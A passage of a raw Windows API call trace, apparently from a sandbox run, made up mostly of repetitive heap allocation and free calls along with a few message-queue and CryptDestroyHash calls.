0x2e54f88 [0226.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0226.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0226.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0226.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0226.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0226.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0226.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0226.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0226.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0226.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0226.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0226.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0226.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0226.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0226.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0226.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0226.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0226.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0226.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0226.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0226.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0226.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0226.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0226.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0226.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0226.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0226.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0226.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0226.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0226.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0226.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0226.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0226.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0226.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0226.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0226.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0226.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0226.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0226.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0226.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0226.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0226.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0226.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0226.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0226.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0226.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0226.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0226.318] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0226.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0226.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0226.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0226.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0226.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0226.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0226.318] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0226.318] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0226.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0226.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0226.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0226.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0226.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0226.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0226.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0226.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0226.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0226.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0226.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0226.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0226.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0226.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0226.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0226.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0226.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0226.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0226.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0226.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0226.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0226.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0226.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0226.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0226.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0226.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0226.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0226.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0226.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511c0 [0226.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0226.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0226.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0226.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0226.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0226.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0226.321] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0226.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0226.321] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0226.321] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0226.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0226.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69888, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0226.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0226.321] CryptDestroyHash (hHash=0xa87090) returned 1 [0226.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0226.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0226.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0226.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0226.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0226.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0226.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0226.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0226.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0226.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0226.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0226.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0226.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0226.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0226.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0226.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0226.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0226.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0226.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0226.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0226.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0226.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0226.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0226.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0226.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0226.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0226.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0226.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0226.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0226.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0226.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0226.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0226.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0226.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0226.324] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0226.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0226.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0226.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0226.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0226.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0226.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0226.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0226.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0226.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0226.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0226.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0226.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0226.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0226.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0226.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0226.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0226.326] HeapFree (in: 